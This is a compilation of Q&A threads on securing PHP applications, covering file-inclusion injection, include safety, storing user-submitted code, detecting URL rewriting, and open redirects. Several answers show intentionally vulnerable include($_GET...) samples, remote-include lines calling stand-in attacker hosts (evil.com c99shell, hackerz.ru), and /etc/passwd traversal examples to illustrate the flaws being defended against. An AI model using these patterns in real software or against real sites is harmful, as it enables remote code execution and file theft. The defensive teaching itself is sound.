Best way to avoid code injection in PHP

My website was recently attacked through what seemed to me to be innocent code:
<?php
if (isset($_GET['page'])) {
    include($_GET['page'] . ".php");
} else {
    include("home.php");
}
?>
There were no SQL calls, so I wasn't worried about SQL injection. But, apparently, SQL isn't the only kind of injection.
This website has an explanation and a few examples of avoiding code injection: http://www.theserverpages.com/articles/webmasters/php/security/Code_Injection_Vulnerabilities_Explained.html
How would you protect this code from code injection?

Use a whitelist and make sure the page is in the whitelist:
$whitelist = array('home', 'page');
if (in_array($_GET['page'], $whitelist)) {
    include($_GET['page'] . '.php');
} else {
    include('home.php');
}

Another way to sanitize the input is to make sure that only allowed characters (no "/", ".", ":", ...) are in it. However, don't use a blacklist of bad characters, but a whitelist of allowed characters:
$page = preg_replace('/[^a-zA-Z0-9]/', '', $page);
... followed by a file_exists.
That way you can make sure that only scripts you want to be executed are executed (for example this would rule out a "blabla.inc.php", because "." is not allowed).
Note: This is kind of a "hack", because then the user could execute "h.o.m.e" and it would give the "home" page, because all it does is remove all prohibited characters. It's not intended to stop "smartasses" who want to do cute stuff with your page, but it will stop people doing really bad things.
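A minimal sketch of that approach (assuming the page scripts live next to the including script; the names are illustrative):
<?php
// Strip everything except letters and digits, then confirm the file exists.
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
$page = preg_replace('/[^a-zA-Z0-9]/', '', $page);
if ($page === '' || !file_exists($page . '.php')) {
    $page = 'home';
}
include($page . '.php');
?>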
BTW: Another thing you could do in your .htaccess file is to prevent obvious attack attempts:
RewriteEngine on
RewriteCond %{QUERY_STRING} http[:%] [NC]
RewriteRule .* /-http- [F,NC]
RewriteRule http: /-http- [F,NC]
That way, all page accesses with "http:" in the URL (or query string) result in a "Forbidden" error message, without even reaching the PHP script. That means less server load.
However, keep in mind that no "http" is then allowed anywhere in the query string. Your website MIGHT require it in some cases (maybe when filling out a form).
BTW: If you can read German: I also have a blog post on that topic.

The #1 rule when accepting user input is: always sanitize it. Here, you're not sanitizing your page GET variable before passing it to include. You should perform a basic check to see whether the file exists on your server before you include it.

Pek, there are many things to worry about in addition to SQL injection, and even different types of code injection. Now might be a good time to look a little further into web application security in general.
From a previous question on moving from desktop to web development, I wrote:
The OWASP Guide to Building Secure Web Applications and Web Services should be compulsory reading for any web developer that wishes to take security seriously (which should be all web developers). There are many principles to follow that help with the mindset required when thinking about security.
If reading a big fat document is not for you, then have a look at the video of the seminar Mike Andrews gave at Google a couple years back about How To Break Web Software.

I'm assuming you deal with files in the same directory:
<?php
if (isset($_GET['page']) && !empty($_GET['page'])) {
    $page = urldecode($_GET['page']);
    $page = basename($page); // strips any directory components
    $file = dirname(__FILE__) . "/{$page}.php";
    if (!file_exists($file)) {
        $file = dirname(__FILE__) . '/home.php';
    }
} else {
    $file = dirname(__FILE__) . '/home.php';
}
include $file;
?>
This is not too pretty, but should fix your issue.

pek, for a short-term fix apply one of the solutions suggested by other users. For a mid-to-long-term plan you should consider migrating to one of the existing web frameworks. They handle all the low-level stuff like routing and file inclusion in a reliable, secure way, so you can focus on core functionality.
Do not reinvent the wheel. Use a framework. Any of them is better than none. The initial time investment in learning it pays back almost instantly.

Some good answers so far, also worth pointing out a couple of PHP specifics:
The file open functions use wrappers to support different protocols. This includes the ability to open files over a local Windows network, HTTP and FTP, amongst others. Thus, in a default configuration, the code in the original question can easily be used to open any arbitrary file on the internet and beyond; including, of course, all files on the server's local disks (that the web server user may read). /etc/passwd is always a fun one.
Safe mode and open_basedir can be used to restrict files outside of a specific directory from being accessed.
Also useful is the config setting allow_url_fopen, which can disable URL access for the file open functions. Note that in current PHP versions this setting can only be changed in php.ini or the server configuration, not at runtime with ini_set().
These are all nice fall-back safety guards, but please use a whitelist for file inclusion.
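For reference, a minimal sketch of those fall-back guards as php.ini settings (the open_basedir path is a placeholder for your own web root; as noted above, allow_url_fopen must be set here or in the server config):
; Disable URL wrappers for the file open functions
allow_url_fopen = Off
; Confine file access to the web root (placeholder path)
open_basedir = "/var/www/example/"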

I know this is a very old post and I expect you don't need an answer anymore, but I still think a very important aspect is missing, and I'd like to share it with other people reading this post. In your code, including a file based on the value of a variable makes a direct link between the value of a field and the requested result (page becomes page.php). I think it is better to avoid that.
There is a difference between the request for some page and the delivery of that page. If you make this distinction you can make use of nice URLs, which are very user and SEO friendly. Instead of a field value like 'page' you could make a URL like 'Spinoza-Ethica'. That is a key in a whitelist, or a primary key in a database table, and it will return a hardcoded filename or value. That method has several advantages besides a normal whitelist:
the back end response is effectively independent from the front end request. If you want to set up your back end system differently, you do not have to change anything on the front end.
Always make sure you end up with hardcoded filenames or an equivalent from the database (preferably a return value from a stored procedure), because it is asking for trouble when you make use of the information from the request to build the response.
Because your URLs are independent of the delivery from the back end, you will never have to rewrite your URLs in the .htaccess file for this kind of change.
The URLs presented to the user are user friendly, informing the user about the content of the document.
Nice URLs are very good for SEO, because search engines are in search of relevant content, and when your URL is in line with the content it will get a better rating. At least a better rating than when your URL is clearly not in line with your content.
If you do not link directly to a PHP file, you can translate the nice URL into any other type of request before processing it. That gives the programmer much more flexibility.
You will have to sanitize the request, because you get the information from a standard untrustworthy source (the rest of the Web). Using only nice URLs as possible input makes the sanitization process of the URL much simpler, because you can check whether the returned URL conforms to your own format. Make sure the format of the nice URL does not contain characters that are used extensively in exploits (like ', ", <, >, -, &, ; etc.).
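A minimal sketch of such a request-to-delivery mapping (the slugs, filenames and pages/ directory below are made up for illustration):
<?php
// The nice URL is only a lookup key; the filename it maps to is hardcoded.
$pages = array(
    'Spinoza-Ethica' => 'spinoza_ethica.php',
    'home'           => 'home.php',
);
$slug = isset($_GET['page']) ? $_GET['page'] : 'home';
// Reject anything that doesn't match the expected slug format.
if (!preg_match('/^[A-Za-z0-9-]+$/', $slug) || !isset($pages[$slug])) {
    $slug = 'home';
}
include(dirname(__FILE__) . '/pages/' . $pages[$slug]);
?>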

#pek - That won't work, as your array keys are 0 and 1, not 'home' and 'page'.
This code should do the trick, I believe:
<?php
$whitelist = array(
    'home',
    'page',
);

if (in_array($_GET['page'], $whitelist)) {
    include($_GET['page'] . '.php');
} else {
    include('home.php');
}
?>
As you've got a whitelist, there shouldn't be a need for file_exists() either.

Suppose the URL is in this format:
www.yourwebsite.com/index.php?page=http://malicodes.com/shellcode.txt
If shellcode.txt contains SQL or PHP injection code, then your website will be at risk, right? Do think of this; using a whitelist would help.
There is a way to filter all variables to avoid the hacking. You can use PHP IDS or the OSE Security Suite to help avoid the hacking. After installing the security suite, you need to activate it; here is the guide:
http://www.opensource-excellence.com/shop/ose-security-suite/item/414.html
I would suggest you turn on layer 2 protection; then all POST and GET variables will be filtered, especially the ones I mentioned, and if any attacks are found it will report to you immediately.
Safety is always the priority.


PHP - Is "include" function secure?

I'm using the "include" function (e.g. "include 'header2.php'" or "include 'class.users.php'") to add the header or session class to my website. I don't really remember where, but I heard that hackers can somehow abuse this "include" thing, sending a fake included page or something like that.
So basically I would like to know what's up with this "include" function, how I can protect it, how they abuse it, and whether there are better solutions for what I am looking for.
Thanks in advance.
It all depends on how you implement it. If you specifically set the path, then it's secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.
Insecure (Directory Traversal)
<?php
include($_GET['file']);
?>
Insecure (URL fopen - If enabled)
<?php
include('http://evil.com/c99shell.php');
?>
Insecure
<?php
include('./some_dir/' . $_GET['file']);
?>
Partially Insecure ( *.php files are vulnerable )
<?php
include('./some_dir/' . $_GET['file'] . '.php');
?>
Secure (Though not sure why anyone would do this.)
<?php
$allowed = array(
    'somefile.php',
    'someotherfile.php'
);

if (in_array(basename($_GET['file']), $allowed)) {
    include('./includes/' . basename($_GET['file']));
}
?>
Secure
<?php
include('./includes/somefile.php');
?>
The biggest issue with includes is probably giving files a filename extension that doesn't get automatically executed by the web server, for example library.inc or config.inc. Requesting these files with a web browser will reveal the code instead of executing it, and any passwords or exploitable hints will be shown.
Compare config.php, which might have a password in it, with config.inc: pulling up config.inc would in most cases show what the database password is.
There are programmers who use .inc extensions for libraries. The premise is that they won't be in a directory accessible by a web server. However, less security-paranoid programmers might dump such a file into a convenient web directory.
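If .inc files do end up under the web root, one hedged mitigation is to deny them at the server level; for Apache, something like this (Apache 2.4 syntax; 2.2 used Order/Deny directives instead):
<FilesMatch "\.inc$">
    # Never serve raw .inc source to browsers
    Require all denied
</FilesMatch>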
Otherwise, ensure that you don't include a file whose name is submitted via the query string somehow. Ex: include( $_GET['menu_file'] ) <-- this is very wrong.
Include can be abused if you do something like this:
include($_GET["page"]);
and then call the URL:
myscript.php?page=index.php
Attackers can then substitute index.php for hxxp://hackerz.ru/install_stuff.php and your server will gladly run it.
include itself is perfectly safe. Just make sure to always validate/escape your input.
Anything server side (assuming your server isn't compromised) is safe. Doing this:
Insecure
$var = $_GET['var'];
include $var . ".php";
Secure
include "page.php";
Include is safe provided you don't:
Include a remote file like www.someoneelsesssite.com/something.php
Include a file from a path that came from the client. www.mysite.com/bad.php?path=oops/here/is/your/passwords/file
Include a file from another possibly tainted source like a database.
Points 2 and 3 technically have the caveat that if you disallow . or / (or, on Windows, \) you are probably fine. But if you don't know why, you don't know enough about it to risk it. Even when you think the database is read-only or otherwise secure, it is wise not to assume that unless you really have to, which is almost never. A realpath()-based containment check, sketched below, is one way to enforce points 2 and 3.
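A minimal sketch of that check, assuming the includable pages live in an includes/ subdirectory (the directory name and the home.php fallback are assumptions):
<?php
$base = realpath(dirname(__FILE__) . '/includes');
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
$target = realpath($base . '/' . $page . '.php');
// realpath() resolves any ../ sequences and returns false for missing files,
// so a prefix check proves the target really lives under $base.
if ($target !== false && strpos($target, $base . DIRECTORY_SEPARATOR) === 0) {
    include $target;
} else {
    include $base . '/home.php';
}
?>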
As pp19dd's answer points out, it is also vital that you name your includes with the .php extension. If you've set Apache (or whatever web server you are using) to parse another file type as PHP too, that's safe as well. But if you don't know for sure, use .php exclusively.
The best thing to do is to ensure that the page you are trying to include exists first. The real security loopholes come when your include page is determined by some sort of user input, such as a URL variable (?include=page.php). As long as you are cautious of these you should be fine.
if (is_file($file)) {
    // other code, such as user verification, should also go here
    include $file;
} else {
    die();
}
I'm using this method.
<?php include (dirname(__FILE__).'/file.php');

PHP: Secure way save and display user's code from CodeMirror

I'm setting up a simple web-based code editor using CodeMirror to help students learn basic HTML, CSS, and JavaScript.
I want the students to be able to save their code, so it is visible in a stand-alone browser window with its own link that can be shared with friends and family to show off their work (i.e. mydomain.com/users/their-username/test.html).
I currently have the following PHP, but I know my use of $content is not secure at all:
if ($_POST['type'] == 'save') {
    $content  = stripslashes($_POST['code']);
    $username = addslashes(strip_tags($_POST['username'])); // i.e. markrummel
    $filename = addslashes(strip_tags($_POST['filename'])); // i.e. test, index
    $ext      = addslashes(strip_tags($_POST['filetype'])); // i.e. html, css, js
    $path = '/users/' . $username . '/';
    $URL  = $path . $filename . '.' . $ext;
    file_put_contents($URL, $content);
}
In most cases $content should be safe HTML, CSS, or JavaScript, like: <p>My name is Mark</p>, but I want to be prepared in case something malicious is put into the code editor to be saved.
Any suggestions on how I can securely save and display their code? Is there a way to quarantine/sandbox each user's folder from other user folders and the rest of the website?
Maybe there is no secure way to do this and I shouldn't allow anyone I don't trust to save code to my server, but if there is a safe way to do this...that would be great for this project! If not, I'll figure something else out.
Thank you for any help or insight you can offer! -Mark
addslashes and stripslashes do nothing for you here at all. I'm not sure what you are trying to do with them but slashing a string is not a useful form of encoding for filename handling or really any context you are likely to meet in a webapp.
strip_tags is also of no use for anything to do with filenames; it removes HTML from a string (but even then not thoroughly enough to serve as a proper guard against HTML injection).
$URL = $path . $filename . '.' . $ext;
file_put_contents($URL, $content);
Yeah, this is seriously unsafe. By putting .. segments in the username or filename, an attacker can store files outside the root path. With complete control of the filename, including the extension, that can mean executable files like .php or other sensitive files like .htaccess. (Even if $ext were limited to known-good values, depending on the OS your server is running under, it may also be possible to evade that extension appending.)
Whilst it is possible to sanitise filenames by limiting the characters that can be used in them, it's harder than you think to make that watertight when you might be running on eg. a Windows server. It's almost always better to generate filenames yourself (eg using a unique integer ID instead of an attacker-supplied filename) for storage on your local filesystem. You can always use rewrites to make the files appear to have a different address.
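A minimal sketch of the generate-your-own-filename idea; the storage directory, the $db handle and its insertDocument() helper are all hypothetical:
<?php
// The server chooses the stored name; the user-supplied name is only metadata.
$ext = in_array($_POST['filetype'], array('html', 'css', 'js'), true)
     ? $_POST['filetype'] : 'html';
// Hypothetical helper that records the metadata and returns a unique integer ID.
$id = $db->insertDocument($_POST['username'], $_POST['filename'], $ext);
$path = '/var/app/userfiles/' . $id . '.' . $ext; // outside the web root
file_put_contents($path, $_POST['code']);
?>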
In most cases $content should be safe HTML, CSS, or JavaScript
Are you sure that's safe then?
If you serve some user-supplied scripting from inside your domain, it can control everything any of your users does within the site. It could override or fake any user-level security controls you have, upload files under other users' names and so on.
You can try to sanitise submitted HTML to make it use only safe tags, but that's hard to get right, and of no use if you want to permit users to run CSS/JS!
Is there a way to quarantine/sandbox each user's folder from other user folders and the rest of the website?
Yes. Serve each area from a different hostname. eg. put the main site on http://www.example.com/ with sandboxes at http://tom.users.example.com/, http://dick.users.example.com/ and so on.
This prevents direct cross-site scripting. To ensure sandbox sites cannot read cookies from the main site, make sure it is not also running on example.com (redirect it to www.example.com).
This isn't quite a complete sandbox. If you need to ensure sandbox sites cannot write cookies to other sites (potentially breaking them by stopping their own cookies from working), then you have no choice but to run each sandbox on its own full domain. And if you have to guard against Java plugin URL connections, each sandbox needs its own IP address. This gets costly quickly! But these are less serious attacks.
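For Apache, the hostname separation might look roughly like this (a sketch only; the hostnames and document roots are placeholders):
<VirtualHost *:80>
    ServerName www.example.com
    DocumentRoot /var/www/main
</VirtualHost>

<VirtualHost *:80>
    # One sandbox per user; scripts served here can't read www cookies
    ServerName tom.users.example.com
    DocumentRoot /var/www/sandboxes/tom
</VirtualHost>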

How to find out programmatically if a web server instance supports url rewrite

What I want to ask is whether there is a way to find out if a web-server instance has URL rewriting enabled. I need this in order to be able to instantiate the correct type of URL handler.
Theoretically you know in advance if you have it enabled or not and can use something to configure it. I would like, however, to be able to detect this setting automatically at runtime.
The URL rewrite rule would be something very simple like:
^/(.*)$ => /bootstrap.php
This guarantees that the relevant string is present in the REQUEST_URI, but doesn't pollute the _GET array.
Where my research has taken me so far:
Apache.
In my opinion Apache has a very quirky approach, since it sets the REDIRECT_SCRIPT_URI header for rewritten URLs, but not for ones that are not rewritten.
E.g. http://host/ana/are/mere would be rewritten to index.php, so the aforementioned header would be present, but http://host/ wouldn't be rewritten.
Lighttpd.
Lighttpd with fast-cgi behaves OK, setting the REDIRECT_URI header if URL Rewrite is enabled for the current host. This is reliable.
Cherokee.
Well, for Cherokee I haven't found a method, as it uses (in my opinion) a more complicated approach to URL rewriting. (It's called internal redirect, and the FastCGI process doesn't know that the request was redirected.)
Also, I haven't tested other HTTP servers, such as nginx, so if someone has some input on this matter I would love to hear it.
Not the most elegant solution, but you could create a directory, insert a .htaccess and a small php file and try to open it with curl/file_get_contents() from your actual code:
.htaccess
RewriteEngine on
RewriteRule ^(.*?)$ index.php?myparam=$1
index.php
<?php
//open with file_get_contents("http://yoursite/directory/test")
if($_GET['myparam']){die("active");}
?>
Although this might be acceptable during an installation, for performance reasons this shouldn't be done for every request on your site! Save the information somewhere (SQLite/text file).
Update
Apache specific, but apache_get_modules()/phpinfo() in combination with array_search/strpos is maybe helpful to you.
It's already touched upon below, but I believe the following recipe is a rather watertight solution to this problem:
Set up the redirection
Request a page through its rewritten url
If the request returns the page in question, you have redirection set up correctly, if you get HTTP 404 response, then it's not working.
The idea is basically that this works with just about any redirection method. It has already been mentioned, but bears reiterating, such tricks add quite a bit of overhead and are better performed only once (installation or from the settings panel) and then saved in the settings.
Some implementation details, choices to make and a little on how I came to this solution:
I remembered Drupal did such a check during the installing process, so I looked up how they did it. They had the javascript on the install page do an ajax request (synchronously, to prevent concurrency issues with the database). This requires the user installing the software to have javascript turned on, but I don't think that's an unreasonable requirement.
However, I do think using php to request the page might be a cleaner solution. Alongside not bothering with a javascript requirement, it also needs less data to be sent back and forth and just doesn't require the logic of the action to be spread over multiple files. I don't know if there are other (dis)advantage for either method, but this should get you going and let you explore the alternative choices yourself.
There is another choice to be made: whether to test in a test environment or on the normal site. The thing Drupal does is just have the redirection always turned on (such as in the apache case, have the .htaccess file that does redirects just be part of the Drupal download) but only write the fancy urls if the redirection is turned on in the settings. This has the disadvantage that it takes more work to detect which type of redirection is used, but it's still possible (you can for example add a GET variable showing the redirection engine either on a specific test page or even on every page, or you can redirect to a page that sets $redirectionEngine and then includes the real index). Though I don't have much experience with redirection other than with mod_rewrite on apache, I believe this should work with just about every redirection engine.
The other option here is to use a test environment. Basically the idea is to either create a folder and set up redirection for it, or remove the need for file system write access and instead have a folder (or a folder for each redirection engine). This has some disadvantages: you still need write access to set up the redirection for the main site (though maybe not for all redirection engine, I don't really know how you all set them up properly - but for apache you will need write access if you are going to turn on redirection), it might be easier for a bot to detect what software and what version of it you are using through accessing the tests (unless you remove the test folders after testing) and you need to be able to rewrite for only a part of the site (which makes sense for any redirection engine to be a possibility, but I'm not blindly going to assume this functionality). However, this does come with the advantage of it being easier to find out which rewrite engine is being used or basically any other aspect of the redirection. There might also be other advantages I don't know of, so I just give the options and let you pick your method yourself.
With some options left to the user, I believe this should help you set up the system in the manner that you like.
PHP has server-specific functions for Apache, IIS and NSAPI servers. I only have Apache but as merkuro suggested this works as expected:
<?php
if (in_array('mod_rewrite', @apache_get_modules()))
    echo 'mod_rewrite enabled';
else
    echo 'mod_rewrite not enabled';
?>
As PHP's server-specific functions don't cover all the servers you'd like to test in, this probably isn't the best solution.
I'd recommend merkuro's first answer - implementing then testing it in script. I believe it's the only way to get a good result.
Hope that helps!
You can programmatically check for the existence of mod_rewrite if the server is Apache by using the apache_get_modules() function in PHP:
$modules = apache_get_modules();
echo in_array('mod_rewrite', $modules) ? 'mod_rewrite detected' : 'mod_rewrite not detected';
This could be used as the first step, but it is not a foolproof method by any means. Just because mod_rewrite is loaded does not mean it is available for your environment. This also doesn't help if you are on a server that is not Apache.
There are not many consistent methods that will work across all platform combinations. But since the result is consistent, you can test for that. Set up a special redirect, and have a script use PHP's cURL or file_get_contents() to check a test URL. If the redirect was successful, you will get the expected content, and you can test easily for this.
This is a basic .htaccess I set up to redirect ajax to ajax.php:
RewriteEngine On
RewriteRule ajax ajax.php [L]
The following PHP script will attempt to get the contents of ajax. The real script name is ajax.php. If the redirect fails, then it will not get the expected contents.
error_reporting(E_ALL | E_STRICT);
$url = 'http://' . $_SERVER['HTTP_HOST'] . dirname($_SERVER['REQUEST_URI']) . '/ajax';
$result = json_decode(@file_get_contents($url));
echo ($result === "foobar") ? 'mod_rewrite test was successful' : 'mod_rewrite test failed';
Lastly, here is the final piece of the script, ajax.php. This returns the expected response when the redirect is successful:
echo json_encode('foobar');
I have setup a live example of this test, and I have also made available the full sources.
As all the answers already mention, actually testing it is the only way to be sure it works. But instead of redirecting to an actual page and waiting for it to load, I would just check the headers.
In my opinion this is quick enough to be used at runtime, even on a regular site. If it really needs to be high performance, then of course caching it is better.
Just put something like the following in your .htaccess file
RewriteEngine on
RewriteRule ^/redir/My/Super/Special/Hidden/Url/To/Test/$ /redir/longload.php [L,R=307]
And then you can use the following php code to check if mod_rewrite is enabled.
<?php
function HasModRewrite() {
    $s = empty($_SERVER["HTTPS"]) ? '' : (($_SERVER["HTTPS"] == "on") ? "s" : "");
    $sp = strtolower($_SERVER["SERVER_PROTOCOL"]);
    $protocol = substr($sp, 0, strpos($sp, "/")) . $s;
    $port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":" . $_SERVER["SERVER_PORT"]);
    $options['http'] = array(
        'method'          => "HEAD", // headers only, no body needed
        'follow_location' => 0,      // we want the 307 itself, not its target
        'ignore_errors'   => 1,
        'timeout'         => 0.2
    );
    $context = stream_context_create($options);
    $body = file_get_contents($protocol . "://" . $_SERVER['SERVER_NAME'] . $port . '/redir/My/Super/Special/Hidden/Url/To/Test/', NULL, $context);
    if (!empty($http_response_header)) {
        return substr_count($http_response_header[0], ' 307') > 0;
    }
    return false;
}

$st = microtime(true);
$x = HasModRewrite();
$t = microtime(true) - $st;
echo 'Loaded in: ' . $t . '<hr>';
var_dump($x);
?>
output:
Loaded in: 0.002657
---------------------
bool(true)

Is this code vulnerable to hacker attack?

I am really new to online web applications. I am using PHP, and I've got this code:
if(isset($_GET['return']) && !empty($_GET['return'])){
return = $_GET['return'];
header("Location: ./index.php?" . $return);
} else {
header("Location: ./index.php");
}
The $return variable is a URL variable which can easily be changed by a hacker.
E.g. I get the $return variable from this: www.web.com/verify.php?return=profile.php
Is there anything I should take care of? Should I use htmlentities in this line:
header("Location: ./index.php?" . htmlentities($return));
Is it vulnerable to attack by a hacker?
What should I do to prevent hacking?
Apart from that typo on line 2 (it should be $return = $_GET['return'];), you should do $return = urlencode($return) to make sure that $return is a valid query string, as it's passed as a parameter to index.php.
index.php should then verify that return is a valid URL that the user has access to. I do not know how your index.php works, but if it simply displays a page then you could end up with something like index.php?/etc/passwd or similar, which could indeed be a security problem.
Edit: What security hole do you get? There are two possible problems that I can see, depending on how index.php uses the return value:
If index.php redirects the user to the target page, then I could use your site as a relay to redirect the user to a site I control. This could be either used for phishing (I make a site that looks exactly like yours and asks the user for username/password) or simply for advertising.
For example, http://yoursite/index.php?return=http%3A%2F%2Fwww.example.com looks like the user is accessing YourSite, but they then get redirected to www.example.com. As I can encode any character using the %xx notation, this may not even be obvious to the user.
If index.php displays the file from the return parameter, I could try to pass in the name of some system file like /etc/passwd and get a list of all users. Or I could pass in something like ../config.php and get your database connection details.
I don't think that's the case here, but this is such a common security hole I'd still like to point it out.
As said, you want to make sure that the URL passed in through the querystring is valid. Some ways to do that could be:
$newurl = "http://yoursite/" . $return;
this could ensure that you are always only on your domain and never redirect to any other domain
$valid = file_exists($return)
This works if $return is always a page that exists on the hard drive. By checking that return indeed points to a valid file you can filter out bogus entries
If return would accept querystrings (i.e. return=profile.php?step=2) then you would need to parse out the "profile.php" path
Have a list of valid values for $return and compare against it
this is usually impractical, unless you really designed your application so that index.php can only return to a given set of pages
There are many ways to skin this cat, but generally you want to somehow validate that $return points to a valid target. What those valid targets are depends on your specification.
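A hedged sketch combining two of those checks (reduce the value to a bare filename, then verify it exists locally; the directory layout is an assumption):
<?php
$return = isset($_GET['return']) ? $_GET['return'] : '';
// Drop any scheme, host or directory parts the client may have smuggled in.
$return = basename((string) parse_url($return, PHP_URL_PATH));
// Only pass the value along if it names a real page in this directory.
if ($return !== '' && file_exists(dirname(__FILE__) . '/' . $return)) {
    header('Location: ./index.php?' . urlencode($return));
} else {
    header('Location: ./index.php');
}
exit;
?>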
If you're running an older version of PHP (both PHP 4 and 5 had affected releases), then I think you will be vulnerable to header injection - someone can set return to a URL followed by a line return, followed by any other headers they want to make your server send.
You could avoid this by sanitising the string first. It might be enough to strip line returns, but it would be better to have an allowed list of characters - though this might be impractical.
4.4.2 and 5.1.2: This function now prevents more than one header to be sent at once as a protection against header injection attacks.
http://php.net/manual/en/function.header.php
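Even on patched versions, stripping line breaks before the value reaches header() is a cheap belt-and-braces measure; a one-line sketch:
<?php
// CR and LF are what header injection relies on; remove them outright.
$return = str_replace(array("\r", "\n"), '', $_GET['return']);
?>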
What would happen if you put in a page that didn't exist? For example:
return=blowup.php
or
return=http://www.google.co.uk
or
return=http%3A%2F%2Fwww.google.co.uk%2F
You could obfuscate the reference by not including the .php in the variable. You could then append it in the code-behind and check for the existence of the file in your directory / use a switch statement of allowable values before redirecting to it.
In this case, it depends more on what's done with that part of the query string in index.php. If it's being sent to a database query, output, eval(), or exec(), then yes, it's a very common security hole. Most other situations will be safe unfiltered, but it's best to write your own general-purpose sanitizing function which converts quotes of all varieties to their HTML entities, as well as equals symbols.
The things I would do are:
Define what types of return values are allowed.
Write down all possible types of return values.
Then draw conclusions: what characters are not allowed, what the maximum URL length is, what domains are allowed, etc.
Finally, make a filter function according to the above conclusions.
One thing a hacker can do: since you redirect whenever $_GET['return'] contains anything, the hacker can use it for XSS, redirecting to a virus or something similar. But there is no ability to do anything else with it.
